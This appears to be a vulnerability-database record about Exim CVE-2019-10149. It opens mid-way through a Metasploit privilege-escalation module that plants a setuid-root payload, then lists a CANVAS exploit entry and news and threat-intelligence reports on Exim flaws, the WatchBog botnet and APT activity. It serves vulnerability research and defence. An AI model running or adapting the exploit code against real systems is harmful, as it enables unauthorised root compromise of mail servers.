\\\"#{@bash_script_path}\\\"\")\n end\n\n print_status('Payload sent, wait a few seconds...')\n Rex.sleep(5)\n end\n\n def on_new_session(session)\n super\n\n if session.type == 'meterpreter'\n session.core.use('stdapi') unless session.ext.aliases.include?('stdapi')\n session.fs.file.rm(@payload_path)\n else\n session.shell_command_token(\"rm -f #{@payload_path}\")\n end\n end\n\n def check\n if session.type == 'meterpreter'\n begin\n socket_subsystem, socket = open_tcp_connection\n rescue 
StandardError\n return CheckCode::Safe\n end\n res = socket.gets\n socket.close\n socket_subsystem.shutdown\n else\n unless command_exists?('/bin/bash')\n return CheckCode::Safe('bash not found')\n end\n res = cmd_exec(\"/bin/bash -c 'exec 3</dev/tcp/localhost/#{datastore['EXIMPORT']} && \"\\\n \"(read -u 3 && echo $REPLY) || echo false'\")\n if res == 'false'\n vprint_error(\"Couldn't connect to port #{datastore['EXIMPORT']}, \"\\\n 'are you sure exim is listening on this port? (see EXIMPORT)')\n return CheckCode::Safe\n end\n end\n\n if res =~ /Exim ([0-9\\.]+)/i\n version = Gem::Version.new(Regexp.last_match(1))\n vprint_status(\"Found exim version: #{version}\")\n if version >= target[:lower_version] && version <= target[:upper_version]\n return CheckCode::Appears\n else\n return CheckCode::Safe\n end\n end\n\n CheckCode::Unknown\n end\n\n def exploit\n if is_root?\n unless datastore['ForceExploit']\n fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')\n end\n end\n\n unless writable?(base_dir)\n fail_with(Failure::BadConfig, \"#{base_dir} is not writable\")\n end\n\n if nosuid?(base_dir)\n fail_with(Failure::BadConfig, \"#{base_dir} is mounted nosuid\")\n end\n\n unless datastore['PrependSetuid'] && datastore['PrependSetgid']\n fail_with(Failure::BadConfig, 'PrependSetuid and PrependSetgid must both be set to true in order ' \\\n 'to get root privileges.')\n end\n\n unless session.type == 'meterpreter'\n unless command_exists?('/bin/bash')\n fail_with(Failure::NotFound, 'bash not found')\n end\n end\n\n @payload_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))\n write_file(@payload_path, payload.encoded_exe)\n register_file_for_cleanup(@payload_path)\n inject_payload(encode_command(\"/bin/sh -c 'chown root #{@payload_path};\"\\\n \"chmod 4755 #{@payload_path}'\"))\n\n unless setuid?(@payload_path)\n fail_with(Failure::Unknown, \"Couldn't escalate privileges\")\n end\n\n cmd_exec(\"#{@payload_path} & echo 
\")\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/exim4_deliver_message_priv_esc.rb"}], "canvas": [{"lastseen": "2019-12-11T14:23:02", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-10149"], "description": "**Name**| exim_expansion_rce \n---|--- \n**CVE**| CVE-2019-10149 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| exim_expansion_rce \n**Notes**| CVE Name: CVE-2019-10149 \nVENDOR: Exim \nNOTES: A vulnerability exists in Exim since version 4.85 that allows for the execution \nof remote commands as the root user on a system. Current version of the exploit \ninstalls wget if not present and then downloads a CANVAS mosdef callback from \nthe CANVAS host (must be reachable via HTTP). Webserver will bind on port 80 \nif CANVAS is run as root \n \nVersionsAffected: Exim 4.85+ \nRepeatability: Infinite \nReferences: https://www.qualys.com/2019/06/05/cve-2019-10149/return-wizard-rce-exim.txt \nCVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10149 \nDate public: 05/06/2019 \nCVSS: N/A \n\n", "edition": 1, "modified": "2019-06-05T14:29:00", "published": "2019-06-05T14:29:00", "id": "EXIM_EXPANSION_RCE", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/exim_expansion_rce", "title": "Immunity Canvas: EXIM_EXPANSION_RCE", "type": "canvas", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2019-09-06T13:38:07", "bulletinFamily": "info", "cvelist": ["CVE-2019-10149", "CVE-2019-15846"], "description": "[](<https://1.bp.blogspot.com/-LF0wUlVHTPE/XXJVEaDaYZI/AAAAAAAA1AE/CYVf9bikZKUqkBq_hHWqYkCYDsOTZcsSACLcBGAs/s728-e100/exim-email-server-vulnerability.jpg>)\n\nA critical remote code execution vulnerability has been discovered in the popular open-source Exim email server software, leaving at least over half a 
million email servers vulnerable to remote hackers. \n \nExim maintainers today released Exim version 4.92.2 after publishing an early warning two days ago, giving system administrators a [heads-up](<https://www.openwall.com/lists/oss-security/2019/09/04/1>) on its upcoming security patches that affect all versions of the email server software up to and including then-latest 4.92.1. \n \nExim is a widely used, open source mail transfer agent (MTA) software developed for Unix-like operating systems such as Linux, Mac OSX or Solaris, which runs almost 60% of the internet's email servers today for routing, delivering and receiving email messages. \n\n\n \nTracked as [CVE-2019-15846](<https://exim.org/static/doc/security/CVE-2019-15846.txt>), the security vulnerability only affects Exim servers that accept TLS connections, potentially allowing attackers to gain root-level access to the system \"by sending an SNI ending in a backslash-null sequence during the initial TLS handshake.\" \n \nSNI, which stands for Server Name Indication, is an extension of the TLS protocol that allows the server to safely host multiple TLS certificates for multiple sites, all under a single IP address. \n \nAccording to the Exim team, since the vulnerability doesn't depend on the TLS library being used by the server, both GnuTLS and OpenSSL are affected. \n \nMoreover, though the default configuration of the Exim mail server software doesn't come with TLS enabled, some operating systems bundled the Exim software with the vulnerable feature enabled by default. \n \nThe vulnerability was discovered by an open source contributor and security researcher who goes by the online alias Zerons and analyzed by cybersecurity experts at Qualys. \n\n\n \nJust three months ago, Exim also patched a severe remote command execution vulnerability, tracked as CVE-2019-10149, that was actively exploited in the wild by various groups of hackers to compromise vulnerable servers. 
\n \nThe Exim advisory says that a rudimentary proof of concept (PoC) exists for this flaw, but currently there is no known exploit available to the public. \n \nServer administrators are strongly advised to install the latest Exim 4.92.2 version immediately, and if that is not possible, can mitigate the issue by not allowing unpatched Exim servers to accept TLS connections. \n \nThe team says, \"If you can't install the above versions, ask your package maintainer for a version containing the backported fix. On request and depending on our resources we will support you in backporting the fix.\"\n", "modified": "2019-09-06T12:48:28", "published": "2019-09-06T12:48:00", "id": "THN:FF07DE65AF5F03EDE8E6AF8F1D180CA1", "href": "https://thehackernews.com/2019/09/exim-email-server-vulnerability.html", "type": "thn", "title": "Exim TLS Flaw Opens Email Servers to Remote 'Root' Code Execution Attacks", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-09-30T16:06:05", "bulletinFamily": "info", "cvelist": ["CVE-2019-10149", "CVE-2019-15846", "CVE-2019-16928"], "description": "[](<https://1.bp.blogspot.com/-XQUxaOT1qPw/XZHxg5L3xhI/AAAAAAAA1RM/kXL-g2O_A307L_tz4BtC_HMeeMoLnYl-QCLcBGAsYHQ/s728-e100/exim-email-server-security.jpg>)\n\nA critical security vulnerability has been discovered and fixed in the popular open-source **Exim** email server software, which could allow a remote attacker to simply crash or potentially execute malicious code on targeted servers. \n \nExim maintainers today [released](<https://www.exim.org/static/doc/security/CVE-2019-16928.txt>) an urgent security update\u2014**Exim version 4.92.3**\u2014after publishing an early warning two days ago, giving system administrators an early heads-up on its upcoming security patches that affect all versions of the email server software from 4.92 up to and including then-latest version 4.92.2. 
\n \nExim is a widely used, open source mail transfer agent (MTA) developed for Unix-like operating systems like Linux, Mac OSX or Solaris, which runs almost 60 percent of the Internet's email servers today for routing, delivering and receiving email messages. \n\n\n \nThis is the second time this month that the Exim maintainers have released an urgent security update. Earlier this month, the team patched a critical remote code execution flaw ([CVE-2019-15846](<https://thehackernews.com/2019/09/exim-email-server-vulnerability.html>)) in the software that could have allowed remote attackers to gain root-level access to the system. \n \nIdentified as [CVE-2019-16928](<https://bugs.exim.org/show_bug.cgi?id=2449>) and discovered by Jeremy Harris of the Exim Development Team, the vulnerability is a heap-based buffer overflow (memory corruption) issue in string_vformat, defined in the string.c file of the EHLO Command Handler component. \n \n\n\n[](<https://1.bp.blogspot.com/-njg27P0fbKk/XZIgMvMWGvI/AAAAAAAA1Rs/w-qj2SUDS4gW6Z17zKTxdnfdDNMTxhZ0ACLcBGAsYHQ/s728-e100/exim-hacking.jpg>)\n\n \nThe security flaw could allow remote attackers to cause a denial of service (DoS) condition or execute arbitrary code on a targeted Exim mail server using a specially crafted line in the EHLO command with the rights of the targeted user. \n \nAccording to the Exim advisory, a currently [known PoC exploit](<https://git.exim.org/exim.git/patch/478effbfd9c3cc5a627fc671d4bf94d13670d65f>) for this vulnerability allows one to only crash the Exim process by sending a long string in the EHLO command, though other commands could also be used to potentially execute arbitrary code. 
\n \n\n\n> \"The currently known exploit uses an extraordinary long EHLO string to crash the Exim process that is receiving the message,\" says the Exim developers' team.\n\n \n\n\n> \"While at this mode of operation, Exim already dropped its privileges, other paths to reach the vulnerable code may exist.\"\n\n \nIn mid-year, Exim also patched a severe remote command execution vulnerability (CVE-2019-10149) in its email software that was [actively exploited in the wild](<https://thehackernews.com/2019/07/linux-malware-windows-bluekeep.html>) by various groups of hackers to compromise vulnerable servers. \n\n\n[](<https://bit.ly/2nAQ7y5> \"Web Application Firewall\" )\n\n \nTherefore, server administrators are highly recommended to install the latest Exim 4.92.3 version as soon as possible, since there is no known mitigation to temporarily resolve this issue. \n \nThe team also says, \"if you can't install the above versions, ask your package maintainer for a version containing the backported fix. 
On request and depending on our resources, we will support you in backporting the fix.\" \n \nThe security update is available for Linux distributions, including [Ubuntu](<https://usn.ubuntu.com/4141-1/>), [Arch Linux](<https://www.archlinux.org/packages/?q=exim>), [FreeBSD](<https://www.vuxml.org/freebsd/e917caba-e291-11e9-89f1-152fed202bb7.html>), [Debian](<https://security-tracker.debian.org/tracker/CVE-2019-16928>), and [Fedora](<https://bodhi.fedoraproject.org/updates/?search=exim>).\n", "modified": "2019-09-30T15:33:26", "published": "2019-09-30T12:14:00", "id": "THN:A947D0153E6D676ABBCCAB69CD1E73DB", "href": "https://thehackernews.com/2019/09/exim-email-security-vulnerability.html", "type": "thn", "title": "New Critical Exim Flaw Exposes Email Servers to Remote Attacks \u2014 Patch Released", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-25T12:44:19", "bulletinFamily": "info", "cvelist": ["CVE-2016-3088", "CVE-2018-1000861", "CVE-2019-0192", "CVE-2019-10149", "CVE-2019-11581", "CVE-2019-7238"], "description": "[](<https://1.bp.blogspot.com/-EUMkX9DWZUw/XTl2aLC2WFI/AAAAAAAA0jg/7Xl_-nE_HVUt9_1bnZYbpy7o3vPWCbGHwCLcBGAs/s728-e100/linux-malware-windows-bluekeep.jpg>)\n\nCybersecurity researchers have discovered a new variant of **WatchBog**, a Linux-based cryptocurrency mining malware botnet, which now also includes a module to scan the Internet for Windows RDP servers vulnerable to the [Bluekeep flaw](<https://thehackernews.com/2019/05/bluekeep-rdp-vulnerability.html>). \n \nBlueKeep is a highly-critical, wormable, remote code execution vulnerability in the Windows Remote Desktop Services that could allow an unauthenticated remote attacker to take full control over vulnerable systems just by sending specially crafted requests over RDP protocol. 
\n \nThough the [patches for the BlueKeep](<https://thehackernews.com/2019/05/microsoft-security-updates.html>) vulnerability (CVE-2019-0708) were already released by Microsoft in May this year, more than [800,000 Windows machines](<https://www.bitsight.com/blog/industry-response-to-bluekeep-vulnerability>) accessible over the Internet are still vulnerable to the critical flaw. \n\n\n \nFortunately, even after many individuals in the security community developed working remote code exploits for BlueKeep, there is no public proof-of-concept (PoC) exploit available to date, potentially preventing opportunistic hackers from wreaking havoc. \n \nHowever, cybersecurity firm Immunity just yesterday released an updated version of its commercial automated vulnerability assessment and penetration testing (VAPT) tool, CANVAS 7.23, which includes a new module for the BlueKeep RDP exploit. \n\n\n \nIt appears the attackers behind WatchBog are using their botnet network to prepare \"a list of vulnerable systems to target in the future or to sell to third party vendors for profit,\" warned the researchers from [Intezer Lab](<https://www.intezer.com/blog-watching-the-watchbog-new-bluekeep-scanner-and-linux-exploits/>), who discovered the new WatchBog variant. \n \n\n\n> \"The incorporation of the BlueKeep scanner by a Linux botnet may indicate WatchBog is beginning to explore financial opportunities on a different platform,\" the researchers said.\n\n \nThe BlueKeep scanner included in WatchBog scans the Internet and then submits the list of newly discovered RDP hosts, as a hexadecimal data string encrypted using RC4, to the attacker-controlled servers. \n\n\n[](<https://1.bp.blogspot.com/-vcIC_sHLKcs/XTly86EzVVI/AAAAAAAA0jU/AfdazQ8l2pk3kRCqjySyk2GL3XW7075NQCLcBGAs/s728-e100/BlueKeep-RDP-vulnerability-exploit.png>)\n\nAccording to the researchers, the new WatchBog variant has already compromised more than 4,500 Linux machines in the last two months. 
\n \nAlthough WatchBog is operating since late last year, attackers are distributing its new variant in an ongoing campaign active since early June this year. \n \nThe newly-discovered WatchBog variant includes a new spreading module along with exploits for some recently patched vulnerabilities in Linux applications, allowing attackers to find and compromise more Linux systems rapidly. \n\n\n \nThe WatchBog Linux botnet malware contains several modules, as structurally briefed below, which leverages recently patched vulnerabilities in Exim, Jira, Solr, Jenkins, ThinkPHP and Nexus applications to compromise Linux machines. \n \n**Pwn Module** \n \n\n\n * CVE-2019-11581 (Jira)\n * CVE-2019-10149 (Exim)\n * CVE-2019-0192 (Solr)\n * CVE-2018-1000861 (Jenkins)\n * CVE-2019-7238 (Nexus Repository Manager 3)\n \n**Scanning Module** \n \n\n\n * BlueKeep Scanner\n * Jira Scanner\n * Solr Scanner\n \n**Brute-forcing Module** \n \n\n\n * CouchDB instances\n * Redis instances\n \n**Spreading Module** \n \n\n\n * Apache ActiveMQ (CVE-2016-3088)\n * Solr (CVE-2019-0192)\n * Code Execution over Redis\n \nAfter scanning and brute-forcing modules discover a Linux machine running the vulnerable application, WatchBog deploys a script on the targeted machine to download Monero miner modules from Pastebin website. \n \nThe malicious script then also gains persistence on the infected system via crontab and further downloads a new spreader module, which comes in the form of a dynamically linked Cython-compiled ELF executable. \n \nResearchers have recommended Linux and Windows administrators to keep their software and operating systems up-to-date against known vulnerabilities in order to prevent themselves from being a victim of such attack campaigns. 
\n \nYou can find if WatchBog has infected your Linux machine by checking the existence of the \"/tmp/.tmplassstgggzzzqpppppp12233333\" file or the \"/tmp/.gooobb\" file on your system.\n", "modified": "2019-07-25T11:08:32", "published": "2019-07-25T09:38:00", "id": "THN:66694DD5D9C12B2B7881AB6C960E34DC", "href": "https://thehackernews.com/2019/07/linux-malware-windows-bluekeep.html", "type": "thn", "title": "Linux Botnet Adding BlueKeep-Flawed Windows RDP Servers to Its Target List", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2020-08-07T08:03:43", "bulletinFamily": "blog", "cvelist": ["CVE-2008-3431", "CVE-2019-10149", "CVE-2020-0688"], "description": "\n\nFor more than three years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.\n\nThis is our latest installment, focusing on activities that we observed during Q2 2020.\n\nReaders who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact '[intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)'.\n\n## **The most remarkable findings**\n\nOn May 11, the UK-based supercomputing center, ARCHER, announced that it would shut down access to its network while it investigated a security incident. The website stated that the "ARCHER facility is based around a Cray XC30 supercomputer (with 4920 nodes) that provides the central computational resource". At the same time, the German-based bwHPC also announced a security incident and decided to restrict access to its resources. 
The Swiss National Supercomputing Centre, at the time involved in a project to study the small membrane protein of the coronavirus, confirmed that it, and other European high-performance computer facilities, had been attacked and that it had temporarily closed. On May 15, the EGI Computer Security and Incident Response Team (EGI-CSIRT) published an alert covering two incidents that, according to its report, may or may not be related. Both incidents describe the targeting of academic data centers for "CPU mining purposes". The alert includes a number of IoCs, which complement other OSINT (open-source intelligence) observations. Although we weren't able to establish with a high degree of certitude that the ARCHER hack and the incidents described by EGI-CSIRT are related, we suspect they might be. Some media speculated that all these attacks might be related to COVID-19 research being carried out at the supercomputing centers.\n\nInterestingly, last July 16th 2020, NCSC [published](<https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf>) an advisory describing malicious activity targeting institutions related to research to find a vaccine for COVID-19. In this case, the malware used in the attacks belongs to a family called WellMess, as [originally described](<https://www.lac.co.jp/lacwatch/pdf/20180614_cecreport_vol3.pdf>) by LAC Co back in 2018. Until recently, this malware was not believed to be related to any APT activity. Surprisingly, NCSC attributes this activity to the APT-29 threat actor. However, it does not provide any public proof.\n\nFrom our own research, we can confirm that WellMess's activity seems to follow a cycle, being used in campaigns every three months or so since its discovery. We observed a peak of activity in fall of 2019, followed by an increase in the number of C2s in February 2020. We also observed high-profile targeting, including telcos, government and contractors in MENA and the EU. 
However, from our side we cannot confirm attribution or targeting of health institutions at the moment.\n\nFor more details about WellMess, you can check our presentation from GReAT ideas here: <https://youtu.be/xeTYLRCwnFo>\n\n## **Russian-speaking activity**\n\nIn May, researchers at Leonardo published a report about "Penquin_x64", a previously undocumented variant of Turla's Penquin GNU/Linux backdoor. Kaspersky has publicly documented the Penquin family, tracing it back to its Unix ancestors in the Moonlight Maze operation of the 1990s. We followed up on this latest research by generating network probes that detect Penquin_x64 infected hosts at scale, allowing us to discover that tens of internet hoster's servers in Europe and the US are still compromised today. We think it's possible that, following public disclosure of Turla's GNU/Linux tools, the Turla threat actor may have been repurposing Penquin to conduct operations other than traditional intelligence.\n\nIn June, we discovered two different domain names, "emro-who[.]in" and "emro-who[.]org", typo-squatting the World Health Organization (WHO) Regional Office for the Eastern Mediterranean (EMRO). These domains, registered on June 21 using the Njalla.no registrar, seem to be used as sender domains for a spear-phishing campaign. This type of typo-squatting is reminiscent of Sofacy campaigns against other international organizations. Moreover, we have seen Njalla.no recently used to register SPLM and XTUNNEL C2 (command-and-control) servers and we have seen this autonomous system used by Sofacy in the past for a SPLM C2.\n\nHades is an elusive, highly dynamic threat actor that commonly engages in tailored hacking and special access operations, such as the [OlympicDestroyer](<https://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/>) attack or the [ExPetr](<https://securelist.com/schroedingers-petya/78870/>) (aka NotPetya) and Badrabbit attacks. 
On May 28, the US National Security Agency (NSA) [published an alert](<https://www.nsa.gov/News-Features/News-Stories/Article-View/Article/2196511/exim-mail-transfer-agent-actively-exploited-by-russian-gru-cyber-actors/>) detailing the use by Hades of an Exim vulnerability (CVE-2019-10149) for what appears to be a potentially large hacking operation designed for mass access. Our own report expanded on the scripts used in this operation, as well as providing other IoCs that we discovered.\n\n## **Chinese-speaking activity**\n\nIn late 2019, and again in March this year, we described ongoing malicious activities from a previously unknown threat actor that we named [Holy Water](<https://securelist.com/holy-water-ongoing-targeted-water-holing-attack-in-asia/96311/>). Holy Water notably leveraged a Go language and Google Drive-command-driven implant that we dubbed Godlike12. Following the publication of our report, and notifications to relevant incident response organizations, new Holy Water samples were submitted to VirusTotal. The newly discovered samples include Telegram-controlled and open-source-based Python implants that were probably deployed on the victim's networks after a successful intrusion.\n\nIn March, one of our YARA rules from previous research on ShadowPad attacks detected a recently compiled executable file uploaded to VirusTotal. Later we found a few other samples from our own telemetry. ShadowPad is a modular attack platform consisting of a root module and various plugin modules responsible for diverse functionalities. ShadowPad was first discovered by Kaspersky in 2017. In August of that year, one of our customers detected suspicious network activities. After thorough investigation, we found a legitimate software module that had been compromised and backdoored by an advanced threat actor in a sophisticated software supply-chain attack. 
We notified the software vendor and also [published the outcome of our investigations in a technical white paper](<https://securelist.com/shadowpad-in-corporate-networks/81432/>). Since then, ShadowPad malware has been deployed in a number of major cyberattacks, with a different subset of plugins used in different attack cases: the CCleaner incident in 2017 and the [ShadowHammer](<https://securelist.com/operation-shadowhammer/89992/>) attacks in 2018 are the major examples of such attacks.\n\nWhen analyzing new samples from ShadowPad malware, compiled and used in attacks since late 2019, our investigation revealed a strong connection between these recent ShadowPad malware samples and the CactusPete threat actor. CactusPete started deploying ShadowPad malware to a few victims at the beginning of 2019 through its HighProof backdoor. However, since late 2019, ShadowPad has been commonly used in CactusPete attacks.\n\nThis quarter, we described another CactusPete attack campaign, which started in December 2019. In this campaign, the CactusPete threat actor used a new method to drop an updated version of the DoubleT backdoor onto the computers. The attackers implanted a new dropper module in the Microsoft Word Startup directory, most likely through a malicious document. This malicious dropper is responsible for dropping and executing a new version of the DoubleT backdoor, which utilizes a new method of encrypting the C2 server address.\n\nWhile analysing compromised machines in Central Asia, we revealed an additional infection that was unrelated to the initial subject of our investigation. This led us to detect previously unknown malware that we dubbed B&W, which provides an attacker with the capabilities to remotely control a victim's machine. Further analysis of the samples, infrastructure and other related artefacts allowed us to conclude, with medium confidence, that the newly found malware is related to the SixLittleMonkeys APT. 
This group is known to have been active for several years, targeting government entities in Central Asia.\n\nHoneyMyte is an APT threat actor that we have been tracking for several years. In February, our fellow researchers at Avira blogged about HoneyMyte PlugX variants that they had recently observed targeting Hong Kong. PlugX has been used by multiple APT groups over the past decade, especially shared among Chinese-speaking threat actors, and has changed in many ways. Avira's post covers the PlugX loader and backdoor payload, including its USB capabilities. In May, we published an update on this threat actor, specifically providing timely indicators to aid in threat hunting for some of the PlugX variants found in the wild between January and May this year.\n\nIn May, we discovered a watering hole on the website of a Southeast Asian top official. This watering hole, set up in March, seemed to leverage whitelisting and social engineering techniques to infect its targets. The final payload was a simple ZIP archive containing a readme file prompting the victim to execute a CobaltStrike implant. The mechanism used to execute CobaltStrike was DLL side-loading, which decrypted and executed a CobaltStrike stager shellcode. Analysis of the code, the infrastructure and the victimology led us to attribute this watering hole, with high confidence, to the HoneyMyte APT threat actor.\n\nQuarian is a little-known malicious program that Chinese-speaking actors have used since around 2012. We hadn't spotted any further activity until we observed a resurgence in an attack by the Icefog group in 2019. We tracked the activity of the malware following this and noticed a new variant that was used during several attacks on Middle Eastern and African governments during 2020. In one case, we could see that this variant was deployed following exploitation of the CVE-2020-0688 vulnerability on the network of a government entity. 
This vulnerability, which was publicly reported in February 2020, allows an authenticated user to run commands as SYSTEM on a Microsoft Exchange server. In this case, the server was indeed compromised and was hosting the ChinaChopper webshell, which was used to obtain, and later launch, the Quarian and PlugX backdoors. Our analysis led us to assume, with medium to high confidence, that the group behind these attacks is one we track under the name CloudComputating - a Chinese-speaking actor that, based on previous reports, has targeted high-profile Middle Eastern diplomatic targets.\n\nIn March, researchers at Check Point Research published a [report](<https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/>) describing an APT campaign that targeted Mongolia's public sector and leveraged a coronavirus-themed lure to conduct its initial intrusion. We were able to discover further samples and another COVID-themed document with the same targeting, as well as additional targets in Russia. We attribute this activity with medium confidence to IronHusky.\n\n## **Middle East**\n\nThe MuddyWater APT was discovered in 2017 and has been active in the Middle East ever since. In 2019, we reported activity against telecoms providers in Iraq and Iran, as well as government bodies in Lebanon. We recently discovered MuddyWater using a new C++ toolchain in a new wave of attacks in which the actor leveraged an open-source utility called Secure Socket Funneling for lateral movement.\n\nAt the end of May, we observed that Oilrig had included the DNSExfiltrator tool in its toolset. It allows the threat actor to use the DNS over HTTPS (DoH) protocol. Use of the DNS protocol for malware communications is a technique that Oilrig has been using for a long time. The difference between DNS- and DoH-based requests is that, instead of plain-text requests to port 53, they use port 443 in encrypted packets, so the queries are not visible to conventional DNS-traffic monitoring. 
Oilrig added the publicly available DNSExfiltrator tool to its arsenal, which allows DoH queries to Google and Cloudflare services. This time, the operators decided to use subdomains of a COVID-related domain, which are hardcoded in the detected DNSExfiltrator samples.\n\n## **Southeast Asia and Korean Peninsula**\n\nBlueNoroff is one of the most prolific financially motivated APT actors and we have published several reports of BlueNoroff campaigns targeting financial institutions. Recently, we uncovered another campaign that has been active since at least 2017. In this campaign, the group sends spear-phishing emails containing an archived Windows shortcut file. The file names are disguised as security- or cryptocurrency-related files in order to entice users into executing them. The infection chain started from this shortcut file is a complex multi-stage infection procedure. Before delivering the Windows executable payload, the actor uses two VBS and three PowerShell scripts in order to collect system information. The actor very carefully delivers the final payload only to the intended targets. The backdoor payload also utilizes a multi-stage infection procedure. The actor uses it to control infected hosts and implants additional malware for surveillance. These malicious programs are responsible for stealing the user's keystrokes and saving a screenshot of the infected machine. The main targets of this campaign are financial institutions, such as cryptocurrency businesses, and fintech companies. We identified diverse victims from 10 countries, as well as more potential victims from open source intelligence.\n\nThe Lazarus group has been a major threat actor for several years. Alongside goals like cyber-espionage and cyber-sabotage, this threat actor has targeted banks and other financial companies around the globe. The group continues to be very active. 
We recently observed the Lazarus group attacking a software vendor in South Korea using Bookcode, malware that we evaluate to be a Manuscrypt variant, utilizing a watering-hole attack to deliver it. Manuscrypt is one of the Lazarus group's tools that is actively being updated and used. The group attacked the same victim twice. Almost a year prior to compromising this victim, Lazarus attempted to infect it by masquerading as a well-known security tool, but failed. We were able to construct the group's post-exploitation activity, identifying various freeware and red-teaming tools used. Although Lazarus has recently tended to focus more on targeting the financial industry, we believe that in this campaign they were seeking to exfiltrate intellectual property. We also observed that they previously spread Bookcode using a decoy document related to a company working in the defense sector. Based on our observations, we evaluate that the Bookcode malware is being used exclusively for cyber-espionage campaigns.\n\nIn April, we released an early warning about the VHD ransomware, which was first spotted in late March. This ransomware stood out because of its self-replication method. The use of a spreading utility compiled with victim-specific credentials was reminiscent of APT campaigns, but at the time we were unable to link the attack to an existing group. However, Kaspersky was able to identify an incident in which the VHD ransomware was deployed, in close conjunction with known Lazarus tools, against businesses in France and Asia. This indicates that Lazarus is behind the VHD ransomware campaigns that have been documented so far. As far as we know, this is also the first time it has been established that the Lazarus group has resorted to targeted ransomware attacks for financial gain.\n\nLast year we created a private report on a malware framework that we named MATA, which we attribute, with low confidence, to the Lazarus group. 
This framework included several components, such as a loader, orchestrator and plug-ins. Initially, this framework targeted Windows and Linux. However, in April, using a rule written to detect the MATA malware framework, we discovered a suspicious macOS file uploaded to VirusTotal. After looking into this malware, we confirmed that it was a macOS variant of the MATA malware. The malware developers Trojanized an open-source two-factor authentication application and utilized another open-source application template. While investigating, to find more solid evidence for attribution, we found an old Manuscrypt strain that used a similar configuration structure. We also discovered a cluster of C2 servers probably related to this campaign.\n\nThe MATA framework was not the only way that Lazarus targeted macOS. We also observed a cluster of activity linked to [Operation AppleJeus](<https://securelist.com/operation-applejeus-sequel/95596/>). Another cluster was similar to the macOS malware used in a campaign that we call TangDaiwbo. This is a multi-platform cryptocurrency exchange campaign: Lazarus utilizes macro-embedded Office documents and spreads PowerShell or macOS malware, depending on the victim's system.\n\nEarly this year, we reported improvements in a Lazarus campaign targeting a cryptocurrency business. In this campaign, Lazarus adopted a downloader that sends compromised host information and selectively fetches the next-stage payload. Recently, we identified a Lazarus campaign with similar strategies, but targeting academic and automotive sectors. Lazarus also adopted new methods to deliver its tools. First of all, the group elaborated its weaponized document by adopting remote template injection techniques. Previously, Lazarus delivered macro-embedded documents to the victim, but the group has now applied one more stage to hinder detection. 
The group also utilized an open-source PDF reader named Sumatra PDF to make Trojanized applications. They created a Trojanized PDF reader, sending it to the victim with a crafted PDF file. If the victim opens this file, the Trojanised PDF viewer implants malicious files and shows decoy documents to deceive the victim. The actor delivers the final payload very carefully, and executes it in memory. Fortunately, we were able to get the final payload and confirm that it was a Manuscrypt variant that we had already described. We also found that it's the same malware variant that the US CISA (Cybersecurity and Infrastructure Security Agency) recently reported, named COPPERHEDGE.\n\nFollowing our report describing the long-standing [PhantomLance](<https://securelist.com/apt-phantomlance/96772/>) campaign in Southeast Asia, we published a private report providing detailed attribution based on discovered overlaps with reported campaigns of the OceanLotus APT. In particular, we found multiple code similarities with the previous Android campaign, as well as similarities in macOS backdoors, infrastructure overlap with Windows backdoors and a couple of cross-platform resemblances. Based on our research, we believe, with medium confidence, that PhantomLance is a modern Android campaign conducted by OceanLotus. Apart from the attribution details, we described the actor's spreading strategy using techniques to bypass app market filters. We also provided additional details about samples associated with previously reported suspected infrastructure, as well as the latest sample deployed in 2020 that uses Firebase to decrypt its payload.\n\nAdditionally, OceanLotus has been using new variants of its multi-stage loader since the second half of 2019. The new variants use target-specific information (username, hostname, etc.) of the targeted host that they obtained beforehand, in order to ensure their final implant is deployed on the right victim. 
The group continues to deploy its backdoor implant, as well as Cobalt Strike Beacon, configuring them with updated infrastructure.\n\n## **Other interesting discoveries**\n\nThe Deceptikons APT is a long-running espionage group believed to have been providing mercenary services for almost a decade now. The group is not technically sophisticated and has not, to our knowledge, deployed zero-day exploits. The Deceptikons infrastructure and malware set is clever, rather than technically advanced. It is also highly persistent and in many ways reminds us of WildNeutron. Deceptikon's repeated targeting of commercial and non-governmental organizations is somewhat unusual for APT actors. In 2019, Deceptikons spear-phished a set of European law firms, deploying PowerShell scripts. As in previous campaigns, the actor used modified LNK files requiring user interaction to initially compromise systems and execute a PowerShell backdoor. In all likelihood, the group's motivations included obtaining specific financial information, details of negotiations, and perhaps even evidence of the law firms' clientele.\n\nMagicScroll (aka AcidBox) is the name we've given to a sophisticated malware framework, whose main purpose is to decrypt and load an arbitrary payload in kernel mode. The framework consists of several stages. The first stage is a Windows security provider that is loaded by the system on boot and executed in user mode. This decrypts and runs a second payload, which is physically stored in the registry. Although we weren't able to find a victim with this second stage, we were able to find a file that matches the expected format of the second stage. This second stage payload utilizes a well-known vulnerability in a VirtualBox driver (CVE-2008-3431) to load the third stage, which is designed to run in kernel mode. The kernel mode payload is decrypted from a resource from the second stage, using the key retrieved from the registry. 
